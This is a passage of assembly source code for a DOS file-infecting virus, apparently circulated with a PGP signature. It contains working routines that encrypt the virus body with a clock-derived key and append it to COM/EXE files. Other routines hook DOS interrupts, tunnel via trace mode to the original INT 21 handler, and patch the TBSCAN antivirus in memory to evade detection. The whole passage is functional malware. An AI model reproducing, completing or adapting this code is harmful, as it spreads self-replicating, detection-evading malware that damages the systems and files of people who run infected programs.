is_file_infected endp
com_header proc
db 0e9h ;JMP
com_header_offset dw 0000
com_header endp
set_offset_start proc
xor cx,cx
xor dx,dx
no_xor: mov ax,4200h
call dos
ret
set_offset_e:
xor cx,cx
mov ax,4202h
call dos
ret
read_file:
mov ah,3fh
call dos
ret
write_bytes:
mov ah,40h
call dos
ret
write_virus:
xor ax,ax
out 70h,al
in ax,70h ;Get seconds from computer
cmp ah,0 ;If seconds = 0 then
jne dont_mask ;set to 12
mov ah,12
dont_mask:
cmp ah,21h ;???
jne dont_mask1
mov ah,15h
dont_mask1:
mov byte ptr cs:key-1,ah ;Save key in virus decryptor
lea si,start ;move to preallocated memory for
lea di,vir_end ;encryption
inc di
mov cx,virus_size
cld
rep movsb ;Copy uninfected verson to
;encryption area
mov cx,decrypt_size
lea si,vir_end ;load si with virus and address
inc si ;inc to virus image to encrypt
add si,engine_size ;add 16h bytes so as not to
encrypt: ;encrypt virus engine
xor [si],ah
inc si
loop encrypt ;Encrypt
mov ah,40h
mov cx,virus_size
lea dx,vir_end
inc dx
call dos
ret
set_offset_start endp
dos proc near
Pushf ;Save flags for DOS IRET
call dword ptr cs:int_21_off_o ;original dos entry
ret
dos endp
open_file proc near
push ax
mov ax,3d02h
call dos
push ax
pop bx ax ;Put handle into BX
ret
open_file endp
set_critical_error_handler proc near
push ax bx dx es ds
push cs
pop ds
mov ax,3524h
call dos
mov critical_error_seg,es
mov critical_error_off,bx
lea dx,critical_error_handler
mov ax,2524h
call dos
pop ds es dx bx ax
ret
set_critical_error_handler endp
critical_error_off dw ?
critical_error_seg dw ?
restore_critical_error_handler proc near
mov ax,2524h
lds dx,dword ptr cs:critical_error_off
call dos
ret
restore_critical_error_handler endp
int_trace proc near
mov ax,3501h ;get trace interrupt
int 21h
mov di,es ;save seg and offset in di, si
mov si,bx
mov ax,2501h
lea dx,word ptr cs:int_01[bp] ;point trace to our segment
int 21h
pushf
push cs
lea ax,word ptr cs:exit_trace[bp] ;set up for after trace
push ax
cli
pushf
pop ax
or ax,100h ;switch trace flag on
push ax ;save flags
mov ax,word ptr cs:int_21_seg[bp]
push ax ;save seg
mov ax,word ptr cs:int_21_off[bp]
push ax ;save offset
mov ax,351ch ;get INT 1c address
mov byte ptr cs:trace_flag[bp],1
mov bx,bp
iret
exit_trace:
mov byte ptr cs:trace_flag[bp],0 ;turn of our trace flag
sti ;restore interrupts
mov ax,2501h ;restore original INT 01
mov dx,si ;Vectors
mov ds,di
int 21h
ret ;Done
int_01:
push bp
mov bx,bp
mov bp,sp
cmp byte ptr cs:trace_flag[bx],1
je tunnel_dos
tunnel:
and word ptr [bp+6],0feffh
mov byte ptr cs:trace_flag[bx],0
pop bp
iret
tunnel_dos:
cmp word ptr [bp+4],300h ;Are we in the DOS SEG?
jb save_vector
pop bp
iret
save_vector:
push cx
mov cx,[bp+2]
mov cs:int_21_off_o[bx],cx ;Delta offsets are used
mov cx,[bp+4]
mov cs:int_21_seg_o[bx],cx
pop cx
jmp tunnel
int_trace endp
program_terminate proc near
cmp byte ptr cs:tbexecute_flag,0
je tbscan_exit
mov byte ptr cs:tbexecute_flag,0 ;Turn off tbscan execute
mov byte ptr cs:done_flag,0 ;flag
call unhook_1c ;Restore int 1C
tbscan_exit:
ret
program_terminate endp
hook_int1c proc near
pusha
push es ds
mov ax,0351ch
call dos
mov int_1c_off,bx
mov bx,es
mov int_1c_seg,bx
lea dx,int1c
mov ah,025h
call dos
mov tbexecute_flag,1
pop ds es
popa
ret
hook_int1c endp
int1c proc near
cmp byte ptr cs:done_flag,1
je exit_1c
cmp byte ptr cs:tbexecute_flag,1
jne exit_1c
call convert_tbscan ;Patch TBSCAN with 'OWN'
exit_1c:
jmp dword ptr cs:int_1c_off
int1c endp
unhook_1c proc near
pusha
push es ds cs
pop ax ;ax= code seg
xor bx,bx
mov es,bx ;es= 0000h
push es
mov bx,word ptr es:timer_seg
mov es,bx
cmp bx,ax
jne dont_unhook
mov ax,word ptr cs:int_1c_seg
mov bx,word ptr cs:int_1c_off
pop es
cli
mov word ptr es:timer_seg,ax
mov word ptr es:timer_seg-2,bx
sti
dont_unhook:
pop ds es
popa
ret
unhook_1c endp
convert_tbscan proc near
pusha
push es ds cs
pop ax
xor bx,bx
mov es,bx
mov bx,word ptr es:timer_seg ;Trace through INT 1c which is
mov di,word ptr es:timer_seg-2 ;hooked by TBSCAN
mov es,bx
cmp bx,ax
je exit_convert
xor ax,ax
lea si,replace
push cs
pop ds
next_char2:
inc ax
mov cx,8
push si
rep cmpsb ;search for string 'DOS','OWN'
pop si ;within TBSCAN while it is in
je found_dos ;memory doing it's thing.
cmp ax,0fffeh
je exit_convert
jmp next_char2
found_DOS:
push es
pop ds
sub di,8
mov si,di
add si,4
mov cx,3
rep movsb
mov byte ptr cs:done_flag,1
exit_convert:
pop ds es
popa
ret
; Search Data
replace db 'DOS',0,'OWN',0
done_flag db 0
convert_tbscan endp
Getcpu proc near ;Test CPU Type
Pushf
Pop AX
Push AX
And AX,0FFFh
Push AX
Popf
Pushf
Pop AX
pop BX
And AX,0F000h
Cmp AX,0F000h
ret
getcpu endp
HANDLE:
step1:
data proc near
db '=!Packed file is corrupt'
buffer db 17h dup(?) ;Modified EXE and Com header
db 90h
tbexecute_flag db 0
trace_flag db ? ;Used for tunneling
int_01_off dw ?
int_01_seg dw ?
int_1c_off dw ?
int_1c_seg dw ?
int_21_off_o dw ? ;Original INT 21
int_21_seg_o dw ?
int_21_off dw ? ;Chained INT 21
int_21_seg dw ?
new_seg dw ?
old_date dw ?
old_time dw ?
buffer1 db 90h ;Original file header for
mov ax,4c00h ;Com and Exe files
int 21h
db 11h dup(?)
db 90h
data endp
vir_end:
code ends
end main
-----BEGIN PGP SIGNATURE-----
Version: 2.2
iQCVAgUBLfmlNU0EOTLgG0HDAQGeXgP+P0etYMi/3zA+ZIpJ0fg2WCs1IrHP3mu+
0HW4yp73Aqosa4wy1YkdskhHCHcKFNfVQAF9k4p2a/h7nbnIzQrMdTPAVZrAyiKh
Yv4hYVY9JXAQGvkbhqirzv6IySHSFQGe5ys8eXrDpo7AwkncUPLXpfX3oqS9olML
/CAlgsYFiFg=
=Q1Ai
-----END PGP SIGNATURE-----